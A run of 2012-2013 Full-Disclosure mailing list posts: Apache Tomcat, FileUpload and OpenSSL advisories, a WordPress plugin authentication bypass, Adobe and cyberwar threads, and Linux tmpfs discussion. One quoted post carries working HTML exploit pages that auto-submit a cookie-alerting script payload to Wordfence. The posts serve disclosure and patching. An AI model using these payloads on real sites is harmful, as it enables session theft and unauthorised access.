IDpHDl9D5mLmBaJi4Lz14cwey5wNgs28ZqX9JCUaLz7qc03J9Au7PrplOr3Xth/Z rQqeKVxFZKaIKQOm2NKs7v7bZAhzp/mKt/u9ndnk0uKk2Tf3i6QJ1GtICTY22eB6 Eh4s/o2BJDgGop0P7cTmrAv1uKu6/72eoUJBMyyGCIN67URzVZRwMQnmW6TqZoBt tASvlTVD53HV3aPdhDHDjP9x/6V6cODD29fzn5op59BWhMVuzf+1lhqphJT0hlQQ lnuf4H9UWG8I8/OzN7XNabIbVuYyhjYWnt8HI/8N/4cAHfA67fXkcbDqleKOd6qo Pcp0qDLiZqVFSotSkVFl =hWpv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2012-3544 Chunked transfer encoding extension size is not limited
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2012-3544 Chunked transfer encoding extension size is not limited Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.29 - - Tomcat 6.0.0 to 6.0.36 Description: When processing a request submitted using the chunked transfer encoding, Tomcat ignored but did not limit any extensions that were included. This allows a client to perform a limited DOS by streaming an unlimited amount of data to the server. Mitigation: Users of affected versions should apply one of the following mitigations: - - Tomcat 7.0.x users should upgrade to 7.0.30 or later - - Tomcat 6.0.x users should upgrade to 6.0.37 or later Credit: This issue was identified by Steve Jones. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJRjLHYAAoJEBDAHFovYFnnNacQAKZ8VVSZkh1Tz1hkenVQH9ic rZGNE3dzfdum8sbL18iObOyt7b7iJMDwSv96sD6Ig+6EgiqRJGcj65a9DOIoyNlD dmYT8qj4wK2OUsefUpfX0RQHgAZcZMRHX6UcgBETgVDTVcWoZ3lDWEBCYap9CTLf 2MX34mMawDp+WEXloDIvxtSC5q5u2nW/O4UJHH+jaPnnmYmghHqb2yh9Tkjj3fkG HUtJlK0WuL9TM7IlQySPUHw98BN46illVu8go6xVslE3CLzXIOOOelOnyDH9IFoF D4SbhKb0nSwSi9aUJsjLNAmgx9Cj5shYyWQSP+CCNXfpOaBz11R3lxSmRvbRBDTf lW8SPgKiCIjXSbbKtZzhl9cu21i4yZFwaKm22wKSRoEWghHs5mCNcVwt+qNE34Zx v2eliMYymkc/EDy/aCTz4DwWhGP9XLi8hOtPkSFB46jLLbUOJcAcy3jPnPa9X8Gq FX07EAncpG8uC9wpSd1Vtr8SPJlbRbkwY2NJ9MaRuEtetbC/Gpq8I5fT7MuBM7X9 8r+GoEcjTMYGWb7T+vGzg5HpcnOVY07wvG1Kvdp/cLxxAjGONsAwvZQ1D6VAjkJx bgDOGWqTDm1c7U3MIY+CdrGKpKaRCoCI6UX5vlD/+H3NYjMKadUwpDrFNCwSMF4T 7QzwCUk2DGUI/n7o7S5n =vhss -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)
On Tue, 23 Apr 2013 09:51:55 -0500, Georgi Guninski gunin...@guninski.com wrote: IMHO nobody should bother negotiating with terrorist vendors. Open source programmers: the new terrorists of the 21st century ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2013-0248 Apache Commons FileUpload - Insecure examples
CVE-2013-0248 Apache Commons FileUpload - Insecure examples Severity: Low Vendor: The Apache Software Foundation Versions Affected: - Commons FileUpload 1.0 to 1.2.2 Description: Commons FileUpload provides file upload capability for Servlets and web applications. During the upload process, FileUpload may (depending on configuration) save the uploaded file temporarily on disk. By default this will be in the system wide tmp directory. Because the temporary files have predictable file names and are stored in a publicly writeable location they are vulnerable to a TOCTOU attack. A successful attack requires that the attacker has write access to the tmp directory. The attack can be prevented by setting the repository to a non-publicly writeable location. The documentation for FileUpload does not highlight the potential security implications of not setting a repository, nor do the provided examples set a repository. This may have caused users to use FileUpload in an insecure manner. Mitigation: Setting the repository to a non-publicly writeable location such as that defined by the ServletContext attribute javax.servlet.context.tempdir will prevent the TOCTOU attack. Credit: This issue was identified by Karl Dyszynski and Hugo Vazquez Carames of SonicWall References: [1] http://commons.apache.org/fileupload/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'portable-phpMyAdmin (WordPress Plugin)' Authentication Bypass (CVE-2012-5469)
I. DESCRIPTION --- portable-phpMyAdmin doesn't verify an existing WordPress session (privileged or not) when accessing the plugin file path directly. Because of how this plugin works, a default installation will provide a full phpMyAdmin console with the privilege level of the MySQL configuration of WordPress. II. TESTED VERSION --- 1.3.0 III. PoC EXPLOIT --- Navigate to http://host/wp-content/plugins/portable-phpmyadmin/wp-pma-modand you will be presented with the full portable-phpMyAdmin web interface without the requirement of a session or any credential. IV. SOLUTION --- Upgrade to version 1.3.1 V. REFERENCES --- http://wordpress.org/extend/plugins/portable-phpmyadmin/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5469 VI. TIMELINE --- 10/13/2012 - Initial developer disclosure 10/14/2012 - Response from developer with commitment to fix the vulnerability 10/31/2012 - Follow-up with developer after no communication or patched release 11/16/2012 - Second attempt to follow-up with developer regarding progress/timetable 11/26/2012 - Contacted WordPress 'plugins team' about lack of progress on patched release 11/27/2012 - WordPress 'plugins team' patches software and releases version 1.3.1 12/12/2012 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2012-4534 Apache Tomcat denial of service
CVE-2012-4534 Apache Tomcat denial of service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.27 - Tomcat 6.0.0 to 6.0.35 Description: When using the NIO connector with sendfile and HTTPS enabled, if a client breaks the connection while reading the response an infinite loop is entered leading to a denial of service. This was originally reported as https://issues.apache.org/bugzilla/show_bug.cgi?id=52858. Mitigation: Users of affected versions should apply one of the following mitigations: - Tomcat 7.0.x users should upgrade to 7.0.28 or later - Tomcat 6.0.x users should upgrade to 6.0.36 or later Credit: The security implications of this bug were identified by Arun Neelicattu of the Red Hat Security Response Team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2012-3546 Apache Tomcat Bypass of security constraints
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2012-3546 Apache Tomcat Bypass of security constraints Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.29 - - Tomcat 6.0.0 to 6.0.35 Earlier unsupported versions may also be affected Description: When using FORM authentication it was possible to bypass the security constraint checks in the FORM authenticator by appending /j_security_check to the end of the URL if some other component (such as the Single-Sign-On valve) had called request.setUserPrincipal() before the call to FormAuthenticator#authenticate(). Mitigation: Users of affected versions should apply one of the following mitigations: - - Tomcat 7.0.x users should upgrade to 7.0.30 or later - - Tomcat 6.0.x users should upgrade to 6.0.36 or later Credit: This issue was identified by The Tomcat security team References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with undefined - http://www.enigmail.net/ iQIcBAEBAgAGBQJQvlNnAAoJEBDAHFovYFnnsJoP/i6/NEKy6+tAcMZ0vKV5CGci 2Epf7NbfWHZhyYZlI445kHoCGQAvMaD0pXlLBUTlzVd2N9Jugk1j2WNPzvOlsaZ0 jx3qeuvNhVZzAa2LIDVSj8ENVNYMiA/S4reZu2u9lHqw5tTP5fapJXDNphSnr0kR A662JdkQlirQtFylkvqFdMoZ3N/vEPwzD8Cs80fafEhEqcoOtrO6yOyaR/kwEFeI 5cxbm/om4+T9cVkRduGqhzLRBWnDiCeBguXiUJXDQorOWmzHq438cNd4ylfFRa1W RBsin8aVY6LMIUqdWWqUnG8SPI7qp7odMRzhI1yLw+y4ykrV5coKeTvalIsh+3ZE FWP7kYmrOYS8NToq56Fxn8bYAuAsJiOsVZ4ox0ozR9HQCEqLEpXTa31hEowUBtig LO0HRgQIeh4rdgxxR2V46JiRw8URNfGevKrhez5B8UAb8hj02SM/3hyg3S3pL2Jn fl0vLnf1+DACd0mUuGmSQNLx5VznW6fkYHZWgmV3SigaroKL4+BbqCO7WvuNs9aA Y8dYt08IgF0O/Kt1vQdks31KEDIqHJOtrZBCySdvVLGz1x+MxluWssZGQELCcj0v ByfH80yh/uIU2Zk9QTaJlEkuODyWTYxmYRk34R3/zZ57za+NQLlpe0cfBRy33wjt VCfhXK6n3npDlmhpeBDw =pOlX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2012-4431 Apache Tomcat Bypass of CSRF prevention filter
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2012-4431 Apache Tomcat Bypass of CSRF prevention filter Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.31 - - Tomcat 6.0.0 to 6.0.35 Description: The CSRF prevention filter could be bypassed if a request was made to a protected resource without a session identifier present in the request. Mitigation: Users of affected versions should apply one of the following mitigations: - - Tomcat 7.0.x users should upgrade to 7.0.32 or later - - Tomcat 6.0.x users should upgrade to 6.0.36 or later Credit: This issue was identified by The Tomcat security team References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with undefined - http://www.enigmail.net/ iQIcBAEBAgAGBQJQvlNvAAoJEBDAHFovYFnnY80QAMvP1gIpG00vfIdiFabpJX55 UEmkPuTSefxZ6NMvAL8GkuUe8CoC6KinCgOx+s8eGlEiHtWFoYvM/Ckg8E3a8SY6 MfD8GLo2av/LdULGSCBrbaL2wFbgixPTBpgR9YS4bdpTK5nVqBZyZOjOzptqRDnE BQXDLLKa65/z7cF57l+XcLs1+JW3KJGRiGJzBNUrJK1x/AzfgRgk4jgvYdyDWdpI zuXKgwBbunblPL4sZhZA2mhoswBIMIJIaHXOAD28Ddt9IIae0UFptY6LmExOkSsa PtshA4EBlO8JTPPcfwtqA/bkHAWCzB1QshkYD57rLF3t1ouDQWI6j8l+q3AYIxzv a0Ix4qzE2hekcjGSCUMZUqNgcaGSjsggaOEo5zauM01osPQxbfpH41eH5fIWlMKi vrxRjYJwLyLdkj3bZFuP7Uq1GL4BLjeKDfqsL4aqcfdBPZea6C9rToEkB8EjD4vf DVdrX4Ivg3ImMMnL+gkX4+5aLp+jpw23G9gZbX1DJn+648iv3yFoK5ysOWy1GAAO x1Iq3pa49NigJ0ipjZvxc07THIoiK/t49/3fWzMR1Xm819oJC2/Qf512l/FpEltK kQ0y8BC4+7ypUZyhtwE3jzLW1x2j4ZBK8l1nX0X92WepJ6piro/7o80qiyDMfqPC hbmBu213eSXnV9kRHveI =jich -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2012-2733 Apache Tomcat Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2012-2733 Apache Tomcat Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.27 - - Tomcat 6.0.0 to 6.0.35 Description: The checks that limited the permitted size of request headers were implemented too late in the request parsing process for the HTTP NIO connector. This enabled a malicious user to trigger an OutOfMemoryError by sending a single request with very large headers. Mitigation: Users of affected versions should apply one of the following mitigations: - - Tomcat 7.0.x users should upgrade to 7.0.28 or later - - Tomcat 6.0.x users should upgrade to 6.0.36 or later Credit: This issue was identified by Josh Spiewak. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://www.enigmail.net/ iQIcBAEBAgAGBQJQmERaAAoJEBDAHFovYFnnn3MQAOpo2bXRZqp7m6B9Baixivr3 XsahCY6g+lk1G9PZewYirHQ9I8rX0Zte0c+7M+D0jfn5kxDsvOzHGSHxn9IMQkYU 4dRKYrSi75b2RvwxWB1AT0PMDLEk6ttaPLSlA0/JdnPluh54dzVJ+4DPCm1NDfzh 7+UTGSIXESstOo9ogJG8oslXdv5m4aYscMdxrJMEDe3SeHp/vtphY8JfO5F8aGlF zUVrl/JY8lXl0UH79dMUHoyFbVeLLfv5vyNauSEQZKIa/2y58B9396H4sMlfAXoe +NcVTo9vb419CQs6I0G4qiN15lZKQk9+bF5hgjTX0GSxi3E88ZJMGuk9rCK8MXr+ XfTTX+YjnRfSjRlrbbd4zejovFUJukVGqkbmXj01Zm42kDmqQnem5lsKWo8IrmCJ Qe9gQstoqfWUY+gBAJ2msfg3HkJkPvehYYvmVO+pIdI7EemOAKOfgGxSjg947gtd gf97Z2BOmpWHUH8+erZ3ro8OaOdhHa9ixmDl2EZxZwjngAn59f9P/srBwmPtTsbh o9GYr3KgU7rfEVOgsZN1aUXvTFjwF50Ju8Yz4D+PagLPnGaraQLIkFc/MdvAFRm6 VP/UxJCRJDdxwjU/cj9jx6/6ZS99JL1ItfYF/v+v/0GCsERcKLphKNzhYpcY888u gpYL4yE7b4ZmqBUuoK1T =+jW7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2012-3439 Apache Tomcat DIGEST authentication weaknesses
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2012-3439 Apache Tomcat DIGEST authentication weaknesses Severity: Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.29 - - Tomcat 6.0.0 to 6.0.35 - - Tomcat 5.5.0 to 5.5.35 - - Earlier, unsupported versions may also be affected Description: Three weaknesses in Tomcat's implementation of DIGEST authentication were identified and resolved: 1. Tomcat tracked client rather than server nonces and nonce count. 2. When a session ID was present, authentication was bypassed. 3. The user name and password were not checked before when indicating that a nonce was stale. These issues reduced the security of DIGEST authentication making replay attacks possible in some circumstances. Mitigation: Users of affected versions should apply one of the following mitigations: - - Tomcat 7.0.x users should upgrade to 7.0.30 or later - - Tomcat 6.0.x users should upgrade to 6.0.36 or later - - Tomcat 5.5.x users should upgrade to 5.5.36 or later Credit: The first issue was identified by Tilmann Kuhn. The second and third issues were identified by the Tomcat security team during the code review resulting from the first issue. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://www.enigmail.net/ iQIcBAEBAgAGBQJQmEReAAoJEBDAHFovYFnnZxwP/2AZNEbwqQXw+7JYHOgjzr7T DyNJFlOSA0AwsflhvCQFJ75qyFgYzYjmyCVJGl/GniBkdnYwLS/wPGrBED3bn1lw 9nXMDLjXToLl4o7qv52gyIlvv60YJs6DW2YzqT7R0WtjF5lTx+JxatUmibFGp826 T+CNwMdGbZUTf57O9JnWnzaiTimC42+5d8q/o6JPmKGWrLrKM8QuS+LtIDckn6o3 FJNly5Sfcc8CAVj3dblRAwVXc6+a0U/A9cLGPDUoEAWHnPfq3VwbMlc90xuKMJno R1huGGxxbp7tOL2qOrI1Tl2ro3ofnVkzdLKOxp5DjSt8+fmPJttOztt8zTCtLNYd 2qFOHxwNrM0tL8RAviQbF1G+sVJtZPO9QrS5EwPTi36nCdZaKWEfhNAtLZ7WRDQ7 0Yxcce+EVjsEJdGNtFOe7CvKTwoRx50OflQeQj9ho3xqJuu6kwKzDUah2Hqlv0Pk 9cTIB5jI/gosvK42KXxq6tKPn+ieHNoL+w58bFAlqBoejQ82E9f4PRV+FFs4mMrt aq5EA/rN3WmorZpTVvecLfyHDg7O4lfWnSvZV6sEWZZyUdKxV7O/IbvHYkfbBg1/ ypZyjcQRZ9VovbDWLdbvy5hb7NMFijGaWeK1ZPVQRMO7DJ7ny61CCa5Rm/2XYDKp 8+W6GnYLC/a4LopbH53O =ANZP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded. http://wordpress.org/extend/plugins/wordfence/changelog/ Thanks for your report. Regards, Mark Maunder. On Fri, Oct 19, 2012 at 7:16 PM, MustLive mustl...@websecurity.com.uawrote: Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. - Affected products: - Vulnerable are Wordfence Security 3.3.5 and previous versions. -- Details: -- XSS (WASC-08): Wordfence Security XSS.html html head titleWordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=scriptalert(document.cookie)/script /form /body /html Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html html head titleWordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=ad...@e-mail.com /form /body /html I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Mark Maunder mmaun...@gmail.com France: (+33) 068-700-8029 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
You didn't download it from download.cnet.com, by any chance? Sounds more like an infection to me. For windows, download and run the following programs. http://www.filehippo.com/download_malwarebytes_anti_malware/ http://www.filehippo.com/download_spybot_search_destroy/5168/ http://www.filehippo.com/download_superantispyware/ On 06/09/2012 19:09, Jeffrey Walton wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
You're right. Jeffrey is no newb. Sorry if it came over the wrong way. On 08/09/2012 0:31, Michael D. Wood wrote: You guys are acting like Jeffrey is a newb to all this stuff. I'm sure he knows what mbam and spybot are, and is able to scan his machine. I'm sure he knows to go straight to the source when downloading flash player, albeit Adobe does include the annoying toolbar unless you choose not to install. -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org - Reply message - From: Mark boogiebr...@yahoo.co.uk To: noloa...@gmail.com Cc: Full Disclosure b full-disclosure@lists.grok.org.uk, BugTraq bugt...@securityfocus.com Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent Date: Fri, Sep 7, 2012 5:32 pm You didn't download it from download.cnet.com, by any chance? Sounds more like an infection to me. For windows, download and run the following programs. http://www.filehippo.com/download_malwarebytes_anti_malware/ http://www.filehippo.com/download_spybot_search_destroy/5168/ http://www.filehippo.com/download_superantispyware/ On 06/09/2012 19:09, Jeffrey Walton wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Nudging everyone back to the alleged Obama tactics.I'm sure everyone has an idea for the big push for cyber warriors in the united states. By the arguments I'm hearing and milling through some of the other infosec posts. Who do you believe have more capability of cyber terror? NSA? Private industry? Hell maybe there is already cyber pmc's running without a leash. On Jun 9, 2012 4:55 PM, Jason Hellenthal jhellent...@dataix.net wrote: Funny, I think I meant to add any system I own. I am all about DTRT and support my government in any which way needed but creating shells on systems I don't own is not my business. On Sat, Jun 09, 2012 at 04:07:39PM +0300, John Doe wrote: By any chance, Jason Hellenthal, do you work for the NOVO medical group? Or is it just NOVO1? I'm asking, because you saying what you say there below, indicates that you may pose a security problem for some health related medical information on people that should be of no interest to NSA or national security. You know, there are such things as due process. And you saying you're willing to give access to anyone from NSA to all systems you have access to is a pretty tall deal, when you're the IT guy for a corporation. Someone might feel you're betraying their trust and even working against their interest when willingly allowing the abuse of their systems, be it for right or wrong for whatever clandestine purpose. There should be a global NO-HIRE list for guys like you. On Sat, Jun 9, 2012 at 4:56 AM, Jason Hellenthal jhellent...@dataix.net wrote: Shit, Ill give the NSA a shell on any system... if it means achieving a greater goal. Whether its wrong or not... let the bots decide who is the better player as long as it brings the US into a primary position of power. On Wed, Jun 06, 2012 at 11:22:32PM -0400, Laurelai wrote: On 6/6/12 2:23 PM, Peter Dawson wrote: haha..da retrun of da farewell dossier !! On Wed, Jun 6, 2012 at 2:21 PM, coderman coder...@gmail.com mailto:coder...@gmail.com wrote: On Wed, Jun 6, 2012 at 11:16 AM, coderman coder...@gmail.com mailto:coder...@gmail.com wrote: ... uncle sam has been up in yer SCADA for two decades. three decades; too early for maths! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Guys can we focus on the fact that the US Government is en mass accessing computer systems without due process, and trying to prosecute the people who made this known to the public. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - (2^(N-1)) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - (2^(N-1)) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Nothing will change as long as we watch. Those who are in power will continue to do as they please. On Jun 7, 2012 1:54 PM, Laurelai laure...@oneechan.org wrote: On 6/7/12 1:48 PM, Ian Hayes wrote: On Thu, Jun 7, 2012 at 1:40 PM, andrew.wallace andrew.wall...@rocketmail.com wrote: On Tue, Jun 5, 2012 at 8:43 PM, valdis.kletni...@vt.edu wrote: One could equally well read that as We're fed up and about to pound North Korea even further back into the Stone Age. With Stuxnet, it was lucky nobody was seriously injured. You cannot condone such weapons Valdis, or your hat will start to turn grey, black. Stuxnet may not have killed anyone, but several Iranian nuclear scientists were assassinated in conjunction with Stuxnet's release. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Civilian scientists at that. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenSSL Security Advisory
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenSSL Security Advisory [24 Apr 2012] === ASN1 BIO incomplete fix (CVE-2012-2131) === It was discovered that the fix for CVE-2012-2110 released on 19 Apr 2012 was not sufficient to correct the issue for OpenSSL 0.9.8. Please see http://www.openssl.org/news/secadv_20120419.txt for details of that vulnerability. This issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a patch sufficient to correct CVE-2012-2110. Thanks to Red Hat for discovering and fixing this issue. Affected users should upgrade to 0.9.8w. References == URL for this Security Advisory: http://www.openssl.org/news/secadv_20120424.txt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQCVAwUBT5ZV8+6tTP1JpWPZAQIQHwQAvrWr3lRsvFkskFR1apYn/xf0l7cUABGX HUUtmDRQJuYFyK0UMdInvcrZ7W82FhzzuGNLwnwI5b8Ttn4oOwcntM335WMf8d10 O4S7OjJmjpNEM1Lb0Ik9ZQdxJTepuWgG4iNKXtZIMdY8amCC+a0jPcwDzji2RfHP OKUh7LxTI5E= =HggZ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
On Sun, Apr 15, 2012 at 02:57:33PM GMT, Pedro Martelletto [pe...@ambientworks.net] said the following: I know OpenBSD has an encrypt swapfs setting on its rc.conf file though not activated by default. i believe it is activated by default: http://marc.info/?l=openbsd-cvsm=85331505174 Thanks for catching that. Sorry, what I had in e-mail was wrong, but the chart on the report is correct. I think I meant FreeBSD. -- Mark S. Krenz IT Director Suso Technology Services, Inc. Sent from Mutt using Linux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
On Thu, Apr 12, 2012 at 10:53:47PM GMT, Grandma Eubanks [tborla...@gmail.com] said the following: Fedora Core 15: /dev/mapper/vg_youwish-lv_swap swapswap defaults0 0 tmpfs /tmptmpfs defaults0 0 Removed other options it should have, but defaults do not include nosuid,nodev,noexec. You obviously customized the install or changed it post installation as this is not the default way it gets setup. Below is the filesystem setup when using all the default options (no customization): # df -hP FilesystemSize Used Avail Use% Mounted on rootfs5.5G 2.1G 3.4G 39% / udev 495M 0 495M 0% /dev tmpfs 502M 272K 501M 1% /dev/shm tmpfs 502M 612K 501M 1% /run /dev/mapper/vg_fedora15test-lv_root 5.5G 2.1G 3.4G 39% / tmpfs 502M 0 502M 0% /sys/fs/cgroup tmpfs 502M 0 502M 0% /media /dev/sda1 485M 30M 430M 7% /boot /dev/mapper/vg_fedora15test-lv_root 5.5G 2.1G 3.4G 39% /tmp /dev/mapper/vg_fedora15test-lv_root 5.5G 2.1G 3.4G 39% /var/tmp /dev/mapper/vg_fedora15test-lv_root 5.5G 2.1G 3.4G 39% /home Despite what the above looks like, /tmp is actually part of the root filesystem. Yes, of course you can change your setup post install or if you're daring enough during the install, but that wasn't the point of the research. -- Mark S. Krenz IT Director Suso Technology Services, Inc. Sent from Mutt using Linux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
